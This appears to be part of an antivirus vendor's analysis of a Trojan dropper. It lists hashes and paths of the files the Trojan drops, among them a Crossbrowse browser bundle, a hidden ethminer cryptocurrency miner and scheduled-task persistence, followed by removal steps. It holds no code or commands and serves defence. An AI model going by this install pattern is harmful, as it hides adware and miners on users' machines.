2a5f246b97d00f77b78d15f72923839b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe |
d827c232ea17f09532bc7d73cc6cf44e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe |
de36bf8875ae7354dee15db775eb671d | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe |
00ccf557175b834662b75c2fe6d8c7fa | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\PepperFlash\pepflashplayer.dll |
cc24001b457f3cfb86ab174d68ffe02b | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome.dll |
8c51d8ebd090ff4d510ca25d01f04196 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_child.dll |
b799e609a738b42a993ec13fbaedff8e | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\d3dcompiler_46.dll |
670da7998dfbf06dae646c8d8f6e06c4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe |
c032d88eb99f7562bb58e00f41b9d6a4 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\ffmpegsumo.dll |
0e2e43dc527bb894b4eaa0723b7d8450 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libegl.dll |
8ff5fccdae68c1f04e29211b8ab2413a | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libexif.dll |
d081a7e3dd9a488c32621440efefd8a2 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\libglesv2.dll |
015b0ed92a5cc7ef3f727eafa50f34c3 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\metro_driver.dll |
c466ce7d02c7b0ee5160c1d40e10fdbf | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\nacl64.exe |
e5aed26e81a2567fe8f71e51feed2ed7 | c:\Program Files\Crossbrowse\Crossbrowse\Application\39.6.2171.95\pdf.dll |
14b1d2a3a4b5f74541292de251244f66 | c:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe |
ea76c784fe08389a29306940372ac66a | c:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsy19.tmp:1136
9035.exe:796
nsq1C.tmp:976
nsq1C.tmp:1312
nsz2A.tmp:784
nss23.tmp:516
nsf7.tmp:644
nst13.tmp:444
setup.exe:700
%original file name%.exe:468
nsmB.tmp:640
amisid.exe:444 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1C.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_plus.ico (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_finance.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bing.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\setup.exe (37305 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tumblr.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\imdb.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%WinDir%\Tasks\157013C7-5C5C-4F90-A397-9AD3412C92F0.job (1464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_news.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nba.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\skype.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nfl.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\groupom.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\espn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\msn.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\weather_channel.ico (5593 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ebay.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].002 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].005 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (24 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\chrome.packed.7z (1266739 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\157013C7-5C5C-4F90-A397-9AD3412C92F0\157013C7-5C5C-4F90-A397-9AD3412C92F0.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\theguardian.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie.zip[1].003 (3959285 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\search.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\ikea.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\wikipedia.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5185\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1F.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj26.tmp (28995 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsExec.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\LICENSE.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\ethm.exe (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\clinfo.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\CPUFeatures.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\cpuminer\ethminer\start.cmd (303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\nsProcess.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz27.tmp\ns28.tmp (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\9035.exe (14022 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libexif.dll (303 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-TW.pak (191 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\el.pak (1668 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bn.pak (1732 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ko.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hu.pak (236 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\he.pak (254 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Crossbrowse\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hi.pak (1713 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pl.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\da.pak (206 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\id.pak (203 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\uk.pak (1622 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sr.pak (1611 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\et.pak (202 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\gu.pak (1705 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\mr.pak (1709 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sv.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (5873 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es.pak (231 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\zh-CN.pak (188 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ms.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\resources.pak (117997 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\it.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fr.pak (240 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sl.pak (212 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\kn.pak (1769 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ro.pak (229 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\39.6.2171.95.manifest (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\chrome.7z (1150215 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ar.pak (294 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nb.pak (207 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Extensions\external_extensions.json (99 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\nacl64.exe (12288 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-GB.pak (190 bytes)
%Documents and Settings%\All Users\Desktop\Crossbrowse.lnk (1 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\te.pak (1762 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lt.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\pepflashplayer.dll (110258 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (3869 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ml.pak (1827 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ru.pak (1613 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\nl.pak (217 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\bg.pak (1641 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-BR.pak (218 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\vi.pak (248 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\icudtl.dat (76792 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (15 bytes)
